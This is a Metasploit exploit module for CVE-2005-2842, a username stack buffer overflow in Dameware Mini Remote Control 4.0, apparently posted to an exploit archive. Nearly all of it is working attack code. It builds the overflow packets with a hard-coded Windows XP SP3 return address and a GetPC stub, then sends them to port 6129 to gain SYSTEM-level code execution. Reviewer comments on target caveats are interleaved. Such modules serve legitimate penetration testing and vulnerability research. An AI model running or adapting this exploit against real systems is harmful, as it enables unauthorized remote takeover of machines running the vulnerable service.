
Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

Posted on 15 September 2017

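require 'msf/core'

# Dameware Mini Remote Control 4.0 (DWRCS.exe, TCP/6129) username stack
# buffer overflow (CVE-2005-2842, BID 14707).
#
# Review notes:
# - The listing this was recovered from had lost every backslash in its
#   byte-string literals ("x00" instead of "\x00"), which would have made
#   each "NUL" three printable bytes and every packet the wrong length.
#   The escapes below are restored; the byte values themselves are unchanged.
# - The only target is a single hard-coded msvcrt.dll address for
#   Windows XP SP3 EN. On any other build the return address is wrong and
#   the result is a crash of the DWRCS service (a DoS), not code execution.
#   Confirm the target before firing this against anything you care about.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow vulnerability
        found in Dameware Mini Remote Control v4.0. The overflow is caused
        when sending an overly long username to the DWRCS executable
        listening on port 6129. The username is read into a strcpy()
        function causing an overwrite of the return pointer leading to
        arbitrary code execution.
      },
      'Author'         => [ 'James Fitts' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'CVE', '2005-2842' ],
          [ 'BID', '14707' ],
          [ 'URL', 'http://secunia.com/advisories/16655' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      # DWRCS runs as a service, so a successful shell is SYSTEM-level.
      'Privileged'     => true,
      'Payload'        =>
        {
          # 140 bytes is all that fits between the payload offset (108) and
          # the end of the 259-byte username field; see pkt1.
          'Space'           => 140,
          # NUL terminates the strcpy(); CR/LF are assumed to break the
          # protocol parser -- verify the latter if a payload is mangled.
          'BadChars'        => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
          # GetPC stub: jmp +3 / pop ecx / jmp +5 / call -8. Leaves the
          # address of the following bytes in ecx before the encoder runs.
          'PrependEncoder'  => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'Compat'          =>
            {
              'SymbolLookup' => '+ws2ord',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3 EN',
            {
              # msvcrt.dll  push esp / retn
              # No ASLR on XP, so this is stable -- but only for this exact
              # msvcrt.dll build; any other version will crash the service.
              'Ret' => 0x77c35459,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sept 01 2005'))

    register_options(
      [
        Opt::RPORT(6129),
      ], self.class)
  end

  # Builds the first (4056-byte) request.
  #
  # Field meanings below are inferred from the offsets the original author
  # used, not from a protocol spec -- treat the header comments as hints.
  # The overflow lives in the 259-byte field at offset 456: return address
  # at +100, payload at +108. With 'Space' capped at 140 the payload ends
  # at most at +248, inside the field, so nothing past it is clobbered
  # unintentionally.
  def pkt1
    p = payload.encoded

    # Overflow buffer: filler, saved return address (push esp / retn),
    # then the encoded payload. Anything after the payload stays filler.
    boom = "\x43" * 259
    boom[100, 4]        = [target.ret].pack('V')
    boom[108, p.length] = p

    packet = "\x00" * 4056
    packet[0, 4]    = "\x30\x11\x00\x00"      # presumably a version/magic field -- unverified
    packet[4, 4]    = "\x00\x00\x00\x00"
    packet[8, 4]    = "\xd7\xa3\x70\x3d"      # opaque; copied from the original capture
    packet[12, 4]   = "\x0a\xd7\x0d\x40"      # opaque; copied from the original capture
    packet[16, 20]  = "\x00" * 20
    packet[36, 4]   = "\x01\x00\x00\x00"
    packet[40, 4]   = [0x00002710].pack('V')  # 10000, little-endian
    packet[196, 259] = rand_text_alpha(259)
    packet[456, 259] = boom                   # username field -> strcpy() overflow
    packet[716, 259] = rand_text_alpha(259)
    packet[976, 259] = rand_text_alpha(259)
    packet[1236, 259] = rand_text_alpha(259)
    packet[1496, 259] = rand_text_alpha(259)

    packet
  end

  # Builds the second (4096-byte) request: all NULs except one 259-byte
  # random alpha field at offset 756. Its role is not documented in the
  # original; it appears to be required to drive the service to the
  # return that triggers the overwritten pointer.
  def pkt2
    packet = "\x00" * 4096
    packet[756, 259] = rand_text_alpha(259)
    packet
  end

  # Sends both packets, then hands off to the payload handler.
  #
  # The two recv() calls rely on the Tcp mixin's socket defaults for
  # timeouts; an unresponsive (or already-crashed) service can stall here
  # until that default expires.
  def exploit
    connect

    sock.put(pkt1)
    sock.recv(1024)

    sock.put(pkt2)
    sock.recv(84)

    handler
    disconnect
  end
end

__END__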

 
